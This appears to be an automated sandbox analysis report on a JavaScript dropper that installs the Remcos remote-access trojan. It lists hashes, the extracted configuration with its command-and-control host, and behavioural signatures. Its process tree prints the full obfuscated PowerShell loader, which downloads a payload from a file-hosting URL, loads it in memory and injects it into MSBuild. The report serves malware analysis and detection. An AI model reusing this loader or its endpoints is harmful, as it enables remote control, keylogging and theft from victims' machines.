Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250207-en -
resource tags
arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system -
submitted
17/02/2025, 13:01
Static task
static1
Behavioral task
behavioral1
Sample
SC__TR1160049907.js
Resource
win7-20240903-en
General
-
Target
SC__TR1160049907.js
-
Size
84KB
-
MD5
dff301df2596bec9d7e48c740d78292e
-
SHA1
9121cae742a8c8d38d8a87ba94d28bcfd8c40eb6
-
SHA256
587201f98c6d3aac49ba4637ecab3e1fcacb4a276f4528a123e6e64bce9fb30d
-
SHA512
d827d8a7f950c9884839a9d3d7588d77865cb542ba8b0e4901ad820ab9a79b941ac505ef37948a4dc504bde6248216e38c95cf54db45d8c6627efcb239c94882
-
SSDEEP
384:HZB5abdZB5abtZB5abdZB5abozZB5abtZB5abdZB5ab8ZB5abtZB5abdZB5ab3ZG:8Vl
Malware Config
Extracted
https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d
https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d
Extracted
remcos
ood
goody.work.gd:4173
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
vlc
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
true
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
ios
-
mouse_option
false
-
mutex
gig-R8G1B2
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
sos
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 5 IoCs
flow pid Process 3 1700 wscript.exe 27 1700 wscript.exe 32 4000 powershell.exe 77 4000 powershell.exe 102 3980 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 63 3112 Process not Found -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-194335498-2604837297-537231065-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-194335498-2604837297-537231065-1000\Control Panel\International\Geo\Nation wscript.exe -
pid Process 4000 powershell.exe 3980 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4000 set thread context of 2308 4000 powershell.exe 109 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1656 MicrosoftEdgeUpdate.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4000 powershell.exe 4000 powershell.exe 3980 powershell.exe 3980 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4000 powershell.exe Token: SeDebugPrivilege 3980 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2308 MSBuild.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1700 wrote to memory of 4000 1700 wscript.exe 90 PID 1700 wrote to memory of 4000 1700 wscript.exe 90 PID 4000 wrote to memory of 3848 4000 powershell.exe 107 PID 4000 wrote to memory of 3848 4000 powershell.exe 107 PID 4000 wrote to memory of 2308 4000 powershell.exe 109 PID 4000 wrote to memory of 2308 4000 powershell.exe 109 PID 4000 wrote to memory of 2308 4000 powershell.exe 109 PID 4000 wrote to memory of 2308 4000 powershell.exe 109 PID 4000 wrote to memory of 2308 4000 powershell.exe 109 PID 4000 wrote to memory of 2308 4000 powershell.exe 109 PID 4000 wrote to memory of 2308 4000 powershell.exe 109 PID 4000 wrote to memory of 2308 4000 powershell.exe 109 PID 4000 wrote to memory of 2308 4000 powershell.exe 109 PID 4000 wrote to memory of 2308 4000 powershell.exe 109 PID 4000 wrote to memory of 2308 4000 powershell.exe 109 PID 4000 wrote to memory of 2308 4000 powershell.exe 109 PID 1768 wrote to memory of 3980 1768 wscript.exe 117 PID 1768 wrote to memory of 3980 1768 wscript.exe 117 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\SC__TR1160049907.js1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$ZicbaoiKcZUWALKLGdzS = '#x#.ip/ssc/sr.marolka#s//:sp##h';$kehTqeKRLeKfurTlWZpW = $ZicbaoiKcZUWALKLGdzS -replace '#', 't';$aZZNNLNLQOGGoCWhCbkO = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$zLqqzpCuitiRLWeqPKCZ = New-Object System.Net.WebClient;$NGkWmrWdKkeoGovHmLaI = $zLqqzpCuitiRLWeqPKCZ.DownloadData($aZZNNLNLQOGGoCWhCbkO);$LcfWBNPkmAWWOKGWGKoB = [System.Text.Encoding]::UTF8.GetString($NGkWmrWdKkeoGovHmLaI);$LPmoLegWkgUKaWGzcufn = '<<BASE64_START>>';$TolPfQorQoSezRukINLU = '<<BASE64_END>>';$AzULjuzPhKbGfBifGLQa = $LcfWBNPkmAWWOKGWGKoB.IndexOf($LPmoLegWkgUKaWGzcufn);$GLkbibcGLGluUGGCkLAA = $LcfWBNPkmAWWOKGWGKoB.IndexOf($TolPfQorQoSezRukINLU);$AzULjuzPhKbGfBifGLQa -ge 0 -and $GLkbibcGLGluUGGCkLAA -gt $AzULjuzPhKbGfBifGLQa;$AzULjuzPhKbGfBifGLQa += $LPmoLegWkgUKaWGzcufn.Length;$ZUSpkPAaqGkdQZAhRxiB = $GLkbibcGLGluUGGCkLAA - $AzULjuzPhKbGfBifGLQa;$ZzbeecchmWiUhQfsRLqP = $LcfWBNPkmAWWOKGWGKoB.Substring($AzULjuzPhKbGfBifGLQa, $ZUSpkPAaqGkdQZAhRxiB);$BknkLihqLhNGNNAGJAtP = [System.Convert]::FromBase64String($ZzbeecchmWiUhQfsRLqP);$BaLiZceemblmicRIWcLW = [System.Reflection.Assembly]::Load($BknkLihqLhNGNNAGJAtP);$WpZmovnLWUinqdclqfIL = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($kehTqeKRLeKfurTlWZpW,'','','','MSBuild','','','','','C:\ProgramData\','petted','js','1','1','pinenchyma'))"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\petted.js"3⤵PID:3848
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2308
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7ODNCNzk1OEYtOEI2RC00NEE0LTgzNUUtN0ZEQzUzQzdDODVCfSIgdXNlcmlkPSJ7NDZDNkQzRjMtMDgxRi00MTQ5LTgwRDQtQkYxMjJEMzIwOTM2fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7RjNFRTQ1RTItMERBMi00RDRBLUFDRTgtMkM3NEJBQjBBOTM5fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSI5IiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDcxNzgiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxOTY4MDM3MTAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI0OTI2MDU5NTM2Ii8-PC9hcHA-PC9yZXF1ZXN0Pg1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:1656
-
C:\Windows\system32\wscript.exewscript.exe C:\ProgramData\petted.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$ZicbaoiKcZUWALKLGdzS = '#x#.ip/ssc/sr.marolka#s//:sp##h';$kehTqeKRLeKfurTlWZpW = $ZicbaoiKcZUWALKLGdzS -replace '#', 't';$aZZNNLNLQOGGoCWhCbkO = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$zLqqzpCuitiRLWeqPKCZ = New-Object System.Net.WebClient;$NGkWmrWdKkeoGovHmLaI = $zLqqzpCuitiRLWeqPKCZ.DownloadData($aZZNNLNLQOGGoCWhCbkO);$LcfWBNPkmAWWOKGWGKoB = [System.Text.Encoding]::UTF8.GetString($NGkWmrWdKkeoGovHmLaI);$LPmoLegWkgUKaWGzcufn = '<<BASE64_START>>';$TolPfQorQoSezRukINLU = '<<BASE64_END>>';$AzULjuzPhKbGfBifGLQa = $LcfWBNPkmAWWOKGWGKoB.IndexOf($LPmoLegWkgUKaWGzcufn);$GLkbibcGLGluUGGCkLAA = $LcfWBNPkmAWWOKGWGKoB.IndexOf($TolPfQorQoSezRukINLU);$AzULjuzPhKbGfBifGLQa -ge 0 -and $GLkbibcGLGluUGGCkLAA -gt $AzULjuzPhKbGfBifGLQa;$AzULjuzPhKbGfBifGLQa += $LPmoLegWkgUKaWGzcufn.Length;$ZUSpkPAaqGkdQZAhRxiB = $GLkbibcGLGluUGGCkLAA - $AzULjuzPhKbGfBifGLQa;$ZzbeecchmWiUhQfsRLqP = $LcfWBNPkmAWWOKGWGKoB.Substring($AzULjuzPhKbGfBifGLQa, $ZUSpkPAaqGkdQZAhRxiB);$BknkLihqLhNGNNAGJAtP = [System.Convert]::FromBase64String($ZzbeecchmWiUhQfsRLqP);$BaLiZceemblmicRIWcLW = [System.Reflection.Assembly]::Load($BknkLihqLhNGNNAGJAtP);$WpZmovnLWUinqdclqfIL = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($kehTqeKRLeKfurTlWZpW,'','','','MSBuild','','','','','C:\ProgramData\','petted','js','1','1','pinenchyma'))"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3980
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5152d6ad60a26b92d4fbea5c6332a1e2a
SHA176cb219b65b7805ff52fb06d281604dc14733ad4
SHA256cd5ba965e2cb92510a04703b56fa6eec015163fda94dee1cda1374f6cc6208a9
SHA51296de114be68efaa88c26a871f912ce9e456f32e6b2a6242092d1cbc1c7b268b8c31b6a33343ad38bf9e1beb8d9dc92f9d472fd2937ff4f567fa078289584a469
-
Filesize
84KB
MD5c4ab1e2c55acfd9c9ca257eaa15c6975
SHA14fb5bb28347d294f4d436d19ae2a4fecd8bd55a8
SHA2566060ae405ec29048d656c80edecd07c913bb4affa78084877e28a92d26265025
SHA51231fc8c48bc78702af3c839e1c158d782885cd6015f0a30ea3848ebb21bcddb4deef9c4a6d74a550fc2d0e993658913f9c1183ce05557f8140caaacb9a92be622
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
4KB
MD50c1978b4b8c6b92dec732d4ba2cea3ab
SHA1e26f244c16a77ea0441121af129377c3ff62adc7
SHA256ded655c813366df2d01854eac604ad5ca27ad8c71617caba9fe42d8ead3c9a32
SHA5123a71b1e2088657496bcc5c1d86363ad29e4e0b403df7e506755632ae9f0066a145fc8fa2ad5e31b9e5f0c3b5706de2f8e8a51e4056041e423ea196ac333781d7
-
Filesize
1KB
MD594dab7957cdba78ea122d3302fcb4103
SHA17d548cb9174038e693a55a0ad94ecd2a79107bf5
SHA2563a5a14198ff1173ea41c15f2bb555d33857b5fc6b988847a61cf8c9863ce20c4
SHA512a00a23215e45c7133a7c60c1fe877d60b31a360cf55d3ab2926c53ac9b598aa305681d02bb04fc9ab46834689e7cb022068f291af8bb268a1c35df7da4de9740
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82